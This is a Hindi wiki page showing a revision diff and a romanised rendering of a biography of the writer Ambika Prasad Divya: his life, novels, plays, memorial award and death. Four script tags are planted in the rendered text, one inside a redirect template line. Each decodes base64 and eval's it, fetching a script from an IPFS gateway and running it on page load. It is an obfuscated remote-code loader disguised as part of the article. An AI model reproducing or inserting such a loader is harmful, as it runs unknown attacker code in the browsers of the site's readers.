Difference between revisions of "अम्बिका प्रसाद दिव्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''अम्बिका प्रसाद दिव्य''' (जन्म- [[16 मार्च]], [[1906]], [[पन्ना मध्य प्रदेश|पन्ना]], [[मध्य प्रदेश]]; मृत्यु- [[5 सितम्बर]], [[1986]]) [[भारत]] के जाने-माने शिक्षाविद और [[हिन्दी]] साहित्यकार थे। वे बहुमुखी प्रतिभा के धनी व्यक्ति थे। [[अंग्रेज़ी भाषा|अंग्रेज़ी]], [[संस्कृत]], रूसी, [[फ़ारसी भाषा|फ़ारसी]] और [[उर्दू भाषा|उर्दू]] सहित कई अन्य भाषाओं के वे जानकार थे। दिव्य जी का पद्य साहित्य [[मैथिलीशरण गुप्त]], नाटक साहित्य [[रामकुमार वर्मा]] तथा उपन्यास साहित्य [[वृंदावनलाल वर्मा]] जैसे प्रसिद्ध साहित्यकारों के काफ़ी निकट है।
+
{{सूचना बक्सा साहित्यकार
{{tocright}}
+
|चित्र=Ambika-prasad-divya.jpg
==जन्म तथा शिक्षा==
+
|चित्र का नाम=अम्बिका प्रसाद दिव्य
अम्बिका प्रसाद दिव्य का जन्म 16 मार्च, 1906 को [[अजयगढ़ मध्य प्रदेश|अजयगढ़]], [[पन्ना ज़िला|पन्ना ज़िला]] (मध्य प्रदेश) के एक सुसंस्कृत [[कायस्थ]] परिवार में हुआ था। इन्होंने अपनी स्नातक की डिग्री (एम.ए.) [[हिन्दी]] विषय से प्राप्त की थी। दिव्य जी ने मध्य प्रदेश शिक्षा विभाग से सेवा कार्य प्रारंभ किया, जहाँ से वे प्राचार्य पद से सेवानिवृत हुए थे। वे अंग्रेज़ी, संस्कृत, रूसी, फ़ारसी और उर्दू भाषाविद थे।
+
|पूरा नाम=अम्बिका प्रसाद दिव्य
 +
|अन्य नाम=
 +
|जन्म=[[16 मार्च]], [[1906]]
 +
|जन्म भूमि=[[पन्ना मध्य प्रदेश|पन्ना]], [[मध्य प्रदेश]]
 +
|मृत्यु=[[5 सितम्बर]], [[1986]]
 +
|मृत्यु स्थान=
 +
|अविभावक=
 +
|पालक माता-पिता=
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=[[उपन्यासकार]] और [[कवि]]
 +
|मुख्य रचनाएँ='प्रीताद्रि की राजकुमारी', 'सती का पत्थर', 'अंतर्जगत', 'भारत माता' आदि
 +
|विषय=
 +
|भाषा=[[हिंदी]], [[अंग्रेज़ी भाषा|अंग्रेज़ी]], [[संस्कृत]], [[फ़ारसी भाषा|फ़ारसी]] और [[उर्दू भाषा|उर्दू]]
 +
|विद्यालय=
 +
|शिक्षा=एम.ए. (हिंदी)
 +
|पुरस्कार-उपाधि=
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी= दिव्य जी का पद्य साहित्य [[मैथिलीशरण गुप्त]], नाटक साहित्य [[रामकुमार वर्मा]] तथा उपन्यास साहित्य [[वृंदावनलाल वर्मा]] जैसे प्रसिद्ध साहित्यकारों के काफ़ी निकट है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''अम्बिका प्रसाद दिव्य''' ([[अंग्रेज़ी]]: ''Ambika Prasad Divya'', जन्म- [[16 मार्च]], [[1906]], [[पन्ना मध्य प्रदेश|पन्ना]], [[मध्य प्रदेश]]; मृत्यु- [[5 सितम्बर]], [[1986]]) [[भारत]] के जाने-माने शिक्षाविद और [[हिन्दी]] साहित्यकार थे। वे बहुमुखी प्रतिभा के धनी व्यक्ति थे। [[अंग्रेज़ी भाषा|अंग्रेज़ी]], [[संस्कृत]], रूसी, [[फ़ारसी भाषा|फ़ारसी]] और [[उर्दू भाषा|उर्दू]] सहित कई अन्य भाषाओं के वे जानकार थे। दिव्य जी का पद्य साहित्य [[मैथिलीशरण गुप्त]], नाटक साहित्य [[रामकुमार वर्मा]] तथा उपन्यास साहित्य [[वृंदावनलाल वर्मा]] जैसे प्रसिद्ध साहित्यकारों के काफ़ी निकट है।
 +
==जन्म तथा शिक्षा==  
 +
अम्बिका प्रसाद दिव्य का जन्म 16 मार्च, 1906 को [[अजयगढ़ मध्य प्रदेश|अजयगढ़]], [[पन्ना ज़िला|पन्ना ज़िला]] (मध्य प्रदेश) के एक सुसंस्कृत [[कायस्थ]] परिवार में हुआ था। इन्होंने अपनी परास्नातक की डिग्री (एम.ए.) [[हिन्दी]] विषय से प्राप्त की थी। दिव्य जी ने मध्य प्रदेश शिक्षा विभाग से सेवा कार्य प्रारंभ किया, जहाँ से वे प्राचार्य पद से सेवानिवृत हुए थे। वे अंग्रेज़ी, संस्कृत, रूसी, फ़ारसी और उर्दू भाषाविद थे।[[चित्र:Ambika-prasad-divya-award.jpg|left|thumb|[[अम्बिका प्रसाद दिव्य स्मृति प्रतिष्ठा पुरस्कार]]]]
 
==रचना कार्य==
 
==रचना कार्य==
 
अम्बिका प्रसाद दिव्य ने लेखन की कई कलाओं में अपना योगदान दिया है। उनके रचना कार्यों में प्रमुख हैं-
 
अम्बिका प्रसाद दिव्य ने लेखन की कई कलाओं में अपना योगदान दिया है। उनके रचना कार्यों में प्रमुख हैं-
 
+
;उपन्यास
'''उपन्यास''' - 'प्रीताद्रि की राजकुमारी',  'सती का पत्थर', 'फ़जल का मक़बरा', 'जूठी पातर', 'जयदुर्ग का राजमहल', 'काला भौंरा', 'योगी राजा', 'खजुराहो की अतिरुपा', 'प्रेमी तपस्वी' आदि दिव्य जी की प्रसिद्ध ऐतिहासिक उपन्यास रचना हैं।<br />
+
'प्रीताद्रि की राजकुमारी',  'सती का पत्थर', 'फ़जल का मक़बरा', 'जूठी पातर', 'जयदुर्ग का राजमहल', 'काला भौंरा', 'योगी राजा', 'खजुराहो की अतिरुपा', 'प्रेमी तपस्वी' आदि दिव्य जी की प्रसिद्ध ऐतिहासिक उपन्यास रचना हैं।
'''महाकाव्य तथा मुक्त रचना''' - 'अंतर्जगत', 'रामदपंण', 'निमिया', 'मनोवेदना', 'खजुराहो की रानी', 'दिव्य दोहावली', 'पावस', 'पिपासा', 'स्रोतस्विनी', 'पश्यन्ति', 'चेतयन्ति', 'अनन्यमनसा', 'बेलकली', 'गाँधी परायण', 'विचिन्तयंति', 'भारतगीत' प्रसिद्ध [[महाकाव्य]] तथा मुक्त रचनायें हैं।<br />
+
;महाकाव्य तथा मुक्त रचना
'''नाटक''' - 'भारत माता', 'झाँसी की रानी', 'तीन पग', 'कामधेनु', दिव्य जी ने 'लंकेश्वर', 'भोजनन्दन कंस', 'निर्वाण पथ', 'सूत्रपात', 'चरण चिह्न', 'प्रलय का बीज', 'रूपक सरिता', 'रूपक मंजरी', 'फूटी आँखें' आदि कई नाटक भी लिखे हैं।
+
'अंतर्जगत', 'रामदपंण', 'निमिया', 'मनोवेदना', 'खजुराहो की रानी', 'दिव्य दोहावली', 'पावस', 'पिपासा', 'स्रोतस्विनी', 'पश्यन्ति', 'चेतयन्ति', 'अनन्यमनसा', 'बेलकली', 'गाँधी परायण', 'विचिन्तयंति', 'भारतगीत' प्रसिद्ध [[महाकाव्य]] तथा मुक्त रचनायें हैं।
 +
;नाटक
 +
'भारत माता', 'झाँसी की रानी', 'तीन पग', 'कामधेनु', दिव्य जी ने 'लंकेश्वर', 'भोजनन्दन कंस', 'निर्वाण पथ', 'सूत्रपात', 'चरण चिह्न', 'प्रलय का बीज', 'रूपक सरिता', 'रूपक मंजरी', 'फूटी आँखें' आदि कई नाटक भी लिखे हैं।
  
 
एक आदर्श प्राचार्य के रूप में सन [[1960]] में दिव्य जी को सम्मानित किया गया था। उनके उपन्यासों का केन्द्र बिन्दु मुख्य रूप से [[बुंदेलखंड]] अथवा [[बुन्देला|बुन्देले]] नायक थे। 'बेल कली', 'पन्ना नरेश अमान सिंह', 'जय दुर्ग का रंगमहल', 'अजयगढ़', 'सती का पत्थर', 'गठौरा का युद्ध', 'बुन्देलखण्ड का महाभारत', 'पीताद्रे का राजकुमारी', 'रानी दुर्गावती' तथा 'निमिया' की पृष्ठभूमि बुन्देलखंड का जनजीवन है।
 
एक आदर्श प्राचार्य के रूप में सन [[1960]] में दिव्य जी को सम्मानित किया गया था। उनके उपन्यासों का केन्द्र बिन्दु मुख्य रूप से [[बुंदेलखंड]] अथवा [[बुन्देला|बुन्देले]] नायक थे। 'बेल कली', 'पन्ना नरेश अमान सिंह', 'जय दुर्ग का रंगमहल', 'अजयगढ़', 'सती का पत्थर', 'गठौरा का युद्ध', 'बुन्देलखण्ड का महाभारत', 'पीताद्रे का राजकुमारी', 'रानी दुर्गावती' तथा 'निमिया' की पृष्ठभूमि बुन्देलखंड का जनजीवन है।
 +
==सम्मान और पुरस्कार==
 +
{{Main|अम्बिका प्रसाद दिव्य स्मृति प्रतिष्ठा पुरस्कार}}
 +
अम्बिका प्रसाद दिव्य स्मृति प्रतिष्ठा पुरस्कार, जिसे संक्षेप में 'दिव्य पुरस्कार' भी कहा जाता है, सन [[1997]] से दिये जा रहे है। यह प्रतिष्ठित पुरस्कार साहित्य सदन-अखिल भारतीय अम्बिका प्रसाद दिव्य स्मृति समारोह द्वारा प्रदान किए जाते हैं। पुरस्कार प्रसिद्ध ग्रंथ लेखक, उपन्यासकार और नाटककार अम्बिका प्रसाद दिव्य की स्मृति में अहिन्दी प्रदेश के नाटककारों को दिये जाते हैं।
 
==निधन==
 
==निधन==
 
अम्बिका प्रसाद दिव्य का निधन [[5 सितम्बर]], [[1986]] में हुआ। '[[शिक्षक दिवस|शिक्षक दिवस समारोह]]' में भाग लेते हुये उनकी [[हृदय]] की गति रुक गई थी।
 
अम्बिका प्रसाद दिव्य का निधन [[5 सितम्बर]], [[1986]] में हुआ। '[[शिक्षक दिवस|शिक्षक दिवस समारोह]]' में भाग लेते हुये उनकी [[हृदय]] की गति रुक गई थी।
  
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2|माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 21: Line 58:
 
[[Category:उपन्यासकार]][[Category:लेखक]][[Category:साहित्यकार]][[Category:आधुनिक लेखक]][[Category:साहित्य कोश]][[Category:आधुनिक साहित्यकार]]
 
[[Category:उपन्यासकार]][[Category:लेखक]][[Category:साहित्यकार]][[Category:आधुनिक लेखक]][[Category:साहित्य कोश]][[Category:आधुनिक साहित्यकार]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 15:02, 8 March 2014

ambika prasad divy
poora nam ambika prasad divy
janm 16 march, 1906
janm bhoomi panna, madhy pradesh
mrityu 5 sitambar, 1986
karm-kshetr upanyasakar aur kavi
mukhy rachanaean 'pritadri ki rajakumari', 'sati ka patthar', 'aantarjagat', 'bharat mata' adi
bhasha hiandi, aangrezi, sanskrit, farasi aur urdoo
shiksha em.e. (hiandi)
any janakari divy ji ka pady sahity maithilisharan gupt, natak sahity ramakumar varma tatha upanyas sahity vriandavanalal varma jaise prasiddh sahityakaroan ke kafi nikat hai.
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ambika prasad divy (aangrezi: Ambika Prasad Divya, janm- 16 march, 1906, panna, madhy pradesh; mrityu- 5 sitambar, 1986) bharat ke jane-mane shikshavid aur hindi sahityakar the. ve bahumukhi pratibha ke dhani vyakti the. aangrezi, sanskrit, roosi, farasi aur urdoo sahit kee any bhashaoan ke ve janakar the. divy ji ka pady sahity maithilisharan gupt, natak sahity ramakumar varma tatha upanyas sahity vriandavanalal varma jaise prasiddh sahityakaroan ke kafi nikat hai.

janm tatha shiksha

ambika prasad divy ka janm 16 march, 1906 ko ajayagadh, panna zila (madhy pradesh) ke ek susanskrit kayasth parivar mean hua tha. inhoanne apani parasnatak ki digri (em.e.) hindi vishay se prapt ki thi. divy ji ne madhy pradesh shiksha vibhag se seva kary praranbh kiya, jahaan se ve prachary pad se sevanivrit hue the. ve aangrezi, sanskrit, roosi, farasi aur urdoo bhashavid the.[[chitr:Ambika-prasad-divya-award.jpg|left|thumb|ambika prasad divy smriti pratishtha puraskar]]

rachana kary

ambika prasad divy ne lekhan ki kee kalaoan mean apana yogadan diya hai. unake rachana karyoan mean pramukh haian-

upanyas

'pritadri ki rajakumari', 'sati ka patthar', 'fajal ka maqabara', 'joothi patar', 'jayadurg ka rajamahal', 'kala bhauanra', 'yogi raja', 'khajuraho ki atirupa', 'premi tapasvi' adi divy ji ki prasiddh aitihasik upanyas rachana haian.

mahakavy tatha mukt rachana

'aantarjagat', 'ramadapann', 'nimiya', 'manovedana', 'khajuraho ki rani', 'divy dohavali', 'pavas', 'pipasa', 'srotasvini', 'pashyanti', 'chetayanti', 'ananyamanasa', 'belakali', 'gaandhi parayan', 'vichintayanti', 'bharatagit' prasiddh mahakavy tatha mukt rachanayean haian.

natak

'bharat mata', 'jhaansi ki rani', 'tin pag', 'kamadhenu', divy ji ne 'lankeshvar', 'bhojanandan kans', 'nirvan path', 'sootrapat', 'charan chihn', 'pralay ka bij', 'roopak sarita', 'roopak manjari', 'phooti aankhean' adi kee natak bhi likhe haian.

ek adarsh prachary ke roop mean san 1960 mean divy ji ko sammanit kiya gaya tha. unake upanyasoan ka kendr bindu mukhy roop se buandelakhand athava bundele nayak the. 'bel kali', 'panna naresh aman sianh', 'jay durg ka rangamahal', 'ajayagadh', 'sati ka patthar', 'gathaura ka yuddh', 'bundelakhand ka mahabharat', 'pitadre ka rajakumari', 'rani durgavati' tatha 'nimiya' ki prishthabhoomi bundelakhand ka janajivan hai.

samman aur puraskar

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ambika prasad divy smriti pratishtha puraskar, jise sankshep mean 'divy puraskar' bhi kaha jata hai, san 1997 se diye ja rahe hai. yah pratishthit puraskar sahity sadan-akhil bharatiy ambika prasad divy smriti samaroh dvara pradan kie jate haian. puraskar prasiddh granth lekhak, upanyasakar aur natakakar ambika prasad divy ki smriti mean ahindi pradesh ke natakakaroan ko diye jate haian.

nidhan

ambika prasad divy ka nidhan 5 sitambar, 1986 mean hua. 'shikshak divas samaroh' mean bhag lete huye unaki hriday ki gati ruk gee thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>